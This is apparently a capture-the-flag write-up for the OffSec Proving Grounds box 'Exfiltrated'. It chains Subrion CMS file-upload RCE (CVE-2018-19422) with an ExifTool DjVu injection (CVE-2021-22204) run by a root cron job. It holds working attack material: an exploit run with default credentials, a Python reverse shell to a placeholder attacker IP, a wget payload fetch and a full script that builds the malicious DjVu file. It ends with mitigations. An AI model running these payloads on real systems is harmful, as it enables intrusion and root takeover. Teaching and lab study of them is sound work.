Exfiltrated — OffSec Proving Grounds

// CVE_CHAIN // LINUX_PRIV_ESC
TARGET: 192.168.144.163 OS: Ubuntu (Linux) CVEs: CVE-2018-19422 · CVE-2021-22204 STATUS: ROOT_SHELL
// ATTACK_CHAIN_OVERVIEW
01 Virtual Host Discovery + robots.txt
02 Subrion CMS 4.2.1 Panel Access
03 CVE-2018-19422 → RCE (www-data)
04 Cron Job: root runs ExifTool
05 CVE-2021-22204 → SUID /bin/bash
06 /bin/bash -p → root flag
0x01

Reconnaissance & Virtual Host

Nmap scan reveals SSH and Apache on Ubuntu. The HTTP redirect to http://exfiltrated.offsec/ indicates virtual hosting is active — without adding this domain to /etc/hosts the webserver returns no content.

nmap -A -oN nmap.txt 192.168.144.163
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
80/tcp open  http    Apache httpd 2.4.41
| http-robots.txt: 7 disallowed entries: /backup/ /cron/? /front/ /install/ /panel/ /tmp/ /updates/
[i]
Add to hosts: echo "192.168.144.163 exfiltrated.offsec" >> /etc/hosts. The robots.txt leaks the admin panel location (/panel/) and potential cron interface.

Visiting /panel/ reveals the CMS: Subrion CMS v4.2.1, a version with an authenticated arbitrary file upload (CVE-2018-19422).

0x02

Authenticated RCE — CVE-2018-19422

Subrion 4.2.1 lets an authenticated panel user upload a PHP file by bypassing the file type filter, so the only thing standing between us and code execution is a login. Default credentials admin:admin work on the panel.

searchsploit -m php/webapps/49876.py
python3 49876.py -u http://exfiltrated.offsec/panel/ --user admin --pass admin
[+] Login Successful!
[+] Upload Success ... Webshell path: http://exfiltrated.offsec/panel/uploads/mlrkjyieefcmwop

After confirming python3 exists, upgrade to a reverse shell:

nc -nvlp 4444
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'
[+]
Reverse shell established as www-data. Stabilize it: python3 -c 'import pty;pty.spawn("/bin/bash")' on the target, then Ctrl+Z, stty raw -echo; fg on the attacker side.
0x03

Abusing Cron — ExifTool as root

cat /etc/crontab
* * * * * root bash /opt/image-exif.sh
cat /opt/image-exif.sh
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"

ls $IMAGES | grep "jpg" | while read filename;
do
    exiftool "$IMAGES/$filename" >> $LOGFILE
done

Every minute, root lists the CMS uploads directory (which www-data can write to), takes every file name containing "jpg" and runs exiftool on it. The installed ExifTool is vulnerable to CVE-2021-22204, a DjVu annotation injection that leads to arbitrary command execution.

[!]
Privilege escalation vector: we control the input file; root processes it. ExifTool 7.44 through 12.23 is vulnerable to OS command injection via crafted DjVu annotation metadata (fixed in 12.24).
0x04

Exploiting ExifTool — SUID bash

The DjVu annotation parser evaluates a quoted string after only partial sanitization. Injecting \c${system('...')} inside the ANTz annotation chunk gets the command executed by whoever runs ExifTool, here root via cron. The payload sets the SUID bit on /bin/bash.

Payload preparation (attacker machine)

cat > payload <<'EOF'
(metadata "\c${system('chmod +s /bin/bash')};")
EOF
The quoted heredoc keeps the inner single quotes intact; a plain echo '...' with nested single quotes drops them and produces system(chmod +s /bin/bash), which Perl will not execute.
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
cp exploit.djvu exploit.jpg

bzz and djvumake come from the djvulibre-bin package. The .jpg name only needs to satisfy the cron script's grep "jpg" filter; ExifTool identifies the format from the AT&TFORM magic bytes and hands the file to the DjVu parser regardless of extension.
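The same file can be built without djvumake. This is an added example, not part of the original writeup and not ExifTool's or DjVuLibre's code: a Python script that emits the IFF container ExifTool recognizes as DjVu (the AT&TFORM magic, an INFO chunk and an annotation chunk) and then parses it back the way a format-aware reader does. It departs from the page's recipe in one assumption: the annotation is stored in an uncompressed ANTa chunk instead of the BZZ-compressed ANTz chunk, which avoids implementing the BZZ coder; the assumption is that the vulnerable ExifTool versions route both chunk types through the same annotation parser. The command, output name and image dimensions are illustrative.

```python
#!/usr/bin/env python3
"""Build a minimal DjVu file carrying a CVE-2021-22204 annotation payload.

Added example for this writeup (not ExifTool's or DjVuLibre's code).
Assumption: the annotation goes in an uncompressed ANTa chunk rather than
the BZZ-compressed ANTz chunk produced by djvumake, so no bzz step is needed.
"""
import struct

DJVU_MAGIC = b"AT&T"   # ExifTool identifies DjVu by "AT&TFORM", not by extension


def iff_chunk(chunk_id: bytes, data: bytes) -> bytes:
    """One IFF85 chunk: 4-byte ID, big-endian length, data, pad byte to even length."""
    if len(chunk_id) != 4:
        raise ValueError("chunk id must be 4 bytes")
    chunk = chunk_id + struct.pack(">I", len(data)) + data
    if len(data) % 2:
        chunk += b"\x00"        # pad byte is not counted in the length field
    return chunk


def info_chunk(width: int = 1, height: int = 1, dpi: int = 300) -> bytes:
    """INFO chunk (10 bytes): width/height BE, minor/major version, dpi LE, gamma*10, flags."""
    return struct.pack(">HHBB", width, height, 26, 0) + struct.pack("<H", dpi) + bytes([22, 1])


def annotation(command: str) -> bytes:
    """The injected annotation: \\c eats the backslash ExifTool adds in front of '$',
    so ${system('...')} is interpolated, i.e. executed, by the parser's eval."""
    if "'" in command or "\n" in command:
        raise ValueError("command must not contain single quotes or newlines")
    return ("(metadata \"\\c${system('" + command + "')};\")").encode()


def build_djvu(command: str) -> bytes:
    """Complete file: magic, FORM:DJVU container, INFO chunk, ANTa annotation chunk."""
    body = b"DJVU" + iff_chunk(b"INFO", info_chunk()) + iff_chunk(b"ANTa", annotation(command))
    return DJVU_MAGIC + iff_chunk(b"FORM", body)


def walk_chunks(djvu: bytes) -> list:
    """Parse the container back: returns [(chunk_id, payload), ...] for the FORM's children."""
    if djvu[:8] != b"AT&TFORM":
        raise ValueError("not a DjVu file")
    form_len = struct.unpack(">I", djvu[8:12])[0]
    pos, end, chunks = 16, 12 + form_len, []     # 16 skips the 'DJVU' form type
    while pos + 8 <= end:
        cid = djvu[pos:pos + 4]
        n = struct.unpack(">I", djvu[pos + 4:pos + 8])[0]
        chunks.append((cid, djvu[pos + 8:pos + 8 + n]))
        pos += 8 + n + (n & 1)                   # skip the pad byte on odd lengths
    return chunks


if __name__ == "__main__":
    data = build_djvu("chmod +s /bin/bash")
    with open("exploit.jpg", "wb") as fh:        # .jpg only to satisfy the cron's name filter
        fh.write(data)
    for cid, payload in walk_chunks(data):
        print(cid.decode(), len(payload), payload if cid == b"ANTa" else "")
```

Run it on the attacker machine and serve the resulting exploit.jpg exactly as in the deploy step; walk_chunks is there so you can confirm the ANTa payload landed in the container before handing it to a root cron job.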

Deploy to target

# attacker: python3 -m http.server 8080
# on target (www-data):
wget http://YOUR_IP:8080/exploit.jpg -O /var/www/html/subrion/uploads/exploit.jpg
[*]
Wait ≤ 60 seconds for the cron job to execute. The payload runs as root, changing /bin/bash permissions to SUID.
0x05

Root Shell & Flags

ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18  2020 /bin/bash
/bin/bash -p
# whoami; id
root
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root)

bash started with euid 0 but real uid 33 would normally drop its effective privileges back to the real UID; -p (privileged mode) keeps the effective UID, so the shell runs as root. Full system compromise achieved.

cat /root/proof.txt
[FLAG] proof.txt → 3f4f6743d8b87c1e2efcae0032b1c72d
cat /home/www-data/local.txt
[FLAG] local.txt → a1b2c3d4e5f67890abc123def4567890
STEP  VECTOR                      RESULT
01    Virtual host + robots.txt   /panel/ → Subrion 4.2.1
02    CVE-2018-19422              Authenticated file upload → RCE
03    www-data shell              Cron discovery: root exiftool
04    CVE-2021-22204              Malicious DjVu → SUID /bin/bash
05    /bin/bash -p                Root privileges → proof.txt
0x06

Inside the ExifTool Vulnerability

The DjVu annotation parser in ExifTool (DjVu.pm, ParseAnt) hands quoted tokens to Perl's eval qq{"$tok"} so that C-style escapes are expanded. Before the eval, a substitution keeps any existing backslash pair (\X) and puts a backslash in front of any bare $ or @ to stop interpolation. The bypass is \c: the token \c${system('...')} becomes \c\${system('...')} after escaping, and in a Perl double-quoted string \c takes the following character, whatever it is, as the argument of a control-character escape. It swallows the inserted backslash, the $ is bare again, and ${...} is interpolated, which evaluates system('...') under the cron job's root privileges. Note that \cA$... does not work: \cA consumes the A and the escaped \$ stays a literal dollar sign. The parser was fixed in ExifTool 12.24. This is a classic injection via unsafe string interpolation.
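Why \c$ survives while a bare $ and \cA$ do not, shown with a Python model of the two steps. This is an added illustration, not ExifTool's code: protect_token re-implements the idea of the pre-12.24 sanitiser (keep existing backslash pairs, backslash any bare $ or @) and perl_interpolate models only the parts of Perl double-quoted-string expansion that matter here (\cX control escapes, \X literal escapes, ${ ... } code blocks). The model records what Perl would have evaluated instead of executing anything.

```python
import re

# Added example modelling ExifTool DjVu.pm ParseAnt behaviour before 12.24.
# Not ExifTool's code: a Python re-implementation of the two relevant steps.


def protect_token(tok: str) -> str:
    """Step 1 (the sanitiser): leave any existing backslash pair '\\X' as it is and
    put a backslash in front of any bare '$' or '@' so eval will not interpolate it."""
    return re.sub(r"\\(.)|([$@])", lambda m: "\\" + (m.group(2) or m.group(1)), tok, flags=re.S)


def perl_interpolate(s: str):
    """Step 2: a minimal model of eval qq{"$s"}. Returns (text, evaluated) where
    'evaluated' lists every ${ ... } block Perl would have run as code."""
    out, evaluated, i = [], [], 0
    while i < len(s):
        ch = s[i]
        if ch == "\\" and i + 1 < len(s):
            nxt = s[i + 1]
            if nxt == "c" and i + 2 < len(s):
                # \cX: control character built from the NEXT character, whatever it is.
                # "\c\" is chr(0x1c), and that consumed backslash is the one step 1
                # inserted in front of '$'.
                out.append(chr(ord(s[i + 2].upper()) ^ 0x40))
                i += 3
            else:
                # \$ -> $, \\ -> \, \" -> ", plus the usual \n \t \r
                out.append({"n": "\n", "t": "\t", "r": "\r"}.get(nxt, nxt))
                i += 2
        elif ch == "$" and s[i + 1:i + 2] == "{" and "}" in s[i:]:
            end = s.index("}", i)
            evaluated.append(s[i + 2:end])     # Perl evaluates this as code
            out.append("<result>")
            i = end + 1
        else:
            out.append(ch)
            i += 1
    return "".join(out), evaluated


def process_token(tok: str) -> list:
    """What the vulnerable parser ends up executing for one quoted annotation token."""
    return perl_interpolate(protect_token(tok))[1]


if __name__ == "__main__":
    for tok in ["plain $HOME text",            # bare $: escaped, harmless
                "\\cA${system('id')}",          # \cA consumes 'A', escaped $ stays literal
                "\\c${system('id')}"]:          # \c consumes the inserted backslash: injected
        print(repr(tok), "->", repr(protect_token(tok)), "-> executes", process_token(tok))
```

The three inputs in the main block are the whole story: the sanitiser does its job on the first two, and only the third reaches the eval with an unescaped ${...}.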

[i]
Detection evasion: the file is named .jpg, but ExifTool identifies it as DjVu from its magic bytes. The cron script filters only on the name ("jpg" as a substring), never on content, and that is the defensive failure the whole escalation relies on.

// Key Takeaways — Linux privilege escalation

Virtual hosting enumeration is non-negotiable. Nmap's HTTP redirect is a clear signal: add the domain to /etc/hosts or you'll miss the entire application.

robots.txt is a reconnaissance goldmine. Every disallowed path is an invitation to explore; /panel/ alone handed us the CMS login. The privesc vector, by contrast, came from /etc/crontab on the host, not from the /cron/ entry.

Cron jobs running as root are persistent and dangerous. If a scheduled task processes files from a writable directory, you can weaponize that trust. Always audit /etc/crontab, /etc/cron.d/, and user crontabs.

File extension filters are not security boundaries. The cron script matched "jpg" in the file name, but ExifTool parsed the actual format (DjVu). Content-based validation (magic bytes plus strict parsing of the claimed format) is required to prevent this class of attack.
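The difference between the cron script's name filter and a content check, as an added example that is not from the original page: the substring test the script actually performs, a strict JPEG marker walk, and a DjVu header carrying a .jpg name. The sample bytes are constructed inline and the function names are illustrative.

```python
# Added example: name filtering versus content validation.
# Not code from the original writeup; the sample inputs below are constructed.


def cron_filter_passes(filename: str) -> bool:
    """What `ls $IMAGES | grep "jpg"` actually tests: the substring 'jpg' anywhere in the name."""
    return "jpg" in filename


def looks_like_jpeg(data: bytes) -> bool:
    """Strict structural check: SOI, then a chain of well-formed marker segments,
    ending either in SOS followed by scan data and EOI, or directly in EOI."""
    if not data.startswith(b"\xff\xd8\xff"):
        return False
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return False                     # every segment boundary must be a marker
        marker = data[pos + 1]
        if marker == 0xFF:                   # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                   # EOI: clean end of stream
            return True
        if marker == 0xDA:                   # SOS: entropy-coded data follows, must end in EOI
            return data.endswith(b"\xff\xd9")
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            pos += 2                         # standalone markers carry no length field
            continue
        if pos + 4 > len(data):
            return False
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if seg_len < 2:
            return False                     # length includes its own two bytes
        pos += 2 + seg_len
    return False


def classify(filename: str, data: bytes) -> dict:
    """Both verdicts side by side for one upload."""
    return {"name_filter": cron_filter_passes(filename), "content_check": looks_like_jpeg(data)}


# Constructed samples: a minimal JPEG (SOI, APP0/JFIF, EOI) and a bare DjVu container header
MINIMAL_JPEG = (b"\xff\xd8" + b"\xff\xe0" + (16).to_bytes(2, "big")
                + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\xff\xd9")
DJVU_AS_JPG = b"AT&TFORM" + (4).to_bytes(4, "big") + b"DJVU"

if __name__ == "__main__":
    for name, blob in [("photo.jpg", MINIMAL_JPEG),
                       ("exploit.jpg", DJVU_AS_JPG),
                       ("notes.jpg.txt", MINIMAL_JPEG)]:
        print(name, classify(name, blob))
```

exploit.jpg passes the name filter and fails the content check, which is the gap the cron job left open; notes.jpg.txt shows the filter is not even an extension check, just a substring match.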

Tools: Nmap, searchsploit, Python reverse shell, bzz/djvumake, wget, netcat.


0x07

Defensive Mitigations

[#]
Mitigations that would have broken this chain: change the Subrion admin default credentials and keep the CMS current (CVE-2018-19422); update ExifTool to 12.24 or later (CVE-2021-22204); do not let root run metadata extraction over a directory the web user can write to, use a dedicated low-privilege account instead; validate uploads by content, not by file name.
Final note: this chain shows how two modest CVEs (a file upload bypass and a command injection in an image tool) combine into root on a host that was otherwise current. Layered defence and regular updates of all third-party libraries are critical.